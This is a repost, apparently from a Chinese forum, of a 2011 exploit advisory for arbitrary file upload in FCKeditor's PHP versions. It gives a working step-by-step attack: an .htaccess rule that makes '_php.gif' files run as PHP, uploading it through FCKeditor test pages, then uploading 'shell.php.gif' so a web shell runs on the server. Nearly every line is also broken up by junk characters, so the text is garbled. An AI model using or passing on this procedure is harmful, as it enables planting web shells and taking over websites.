FCKeditor所有php版本Upload上传漏洞8 q: m( M: k. x- d/ i5 ~
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07- Z: \2 C% J) @6 I( R- F' N
减小字体 增大字体5 g3 p) c# q/ B" s+ y9 Z6 h
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
) {% ~. z9 O9 W) D/ H- q[+] Date: 20113 s$ \5 v5 o3 `" n' I
[+] Author : sinesafe.cn. R' _2 Z5 {, v8 J% k4 A* L
[+] Website : WwW.sinesafe.cn
a$ x2 L& O# e1 R; m' H! n6 W———————————————————
7 p' w+ c" i4 g4 f# O- s1.create a htaccess file:, B/ q& V3 a) o) P, k+ u
code:
( W4 c! p4 V0 r+ N& }- Y j8 K" l<FilesMatch “_php.gif”>" G& N5 E/ L( z8 N9 }1 [
SetHandler application/x-httpd-php1 P) E9 n3 ^# L# G. t" g; l7 j7 O
</FilesMatch>
1 ^2 M+ [; e# h, z* p% q O6 h% z1 i
2.Now upload this htaccess with FCKeditor.
! s1 ^ B; T( P3 p# O: u+ f
1 r, g1 `: Z) L( T' G7 y# u3 O/ fhttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html2 ]& A4 X& i6 B) S
0 d0 F' J0 c8 v# }8 g- H
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
- \9 _ ^& ^% M
& Z$ q8 U; | h: T& t———————————————————————————————-
# o7 S% {, t. s; b3.Now upload shell.php.gif with FCKeditor.
2 s9 C H; l& S8 B, F0 z7 d4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
8 F3 l$ f! w) T1 C# C6 W0 R5.http://www.sinesafe.cn/anything/shell_php.gif
* @9 s( P7 V6 q3 Q9 T3 S6.Now shell is available from server. |
0 g$ q. V0 L+ _+ D* {- N
/ j4 T+ c5 r3 u9 w, X7 Z
0 S$ ]0 Y* e# ~- ]. i& ] |
发表于 2013-10-27 17:25:21
收藏
支持
反对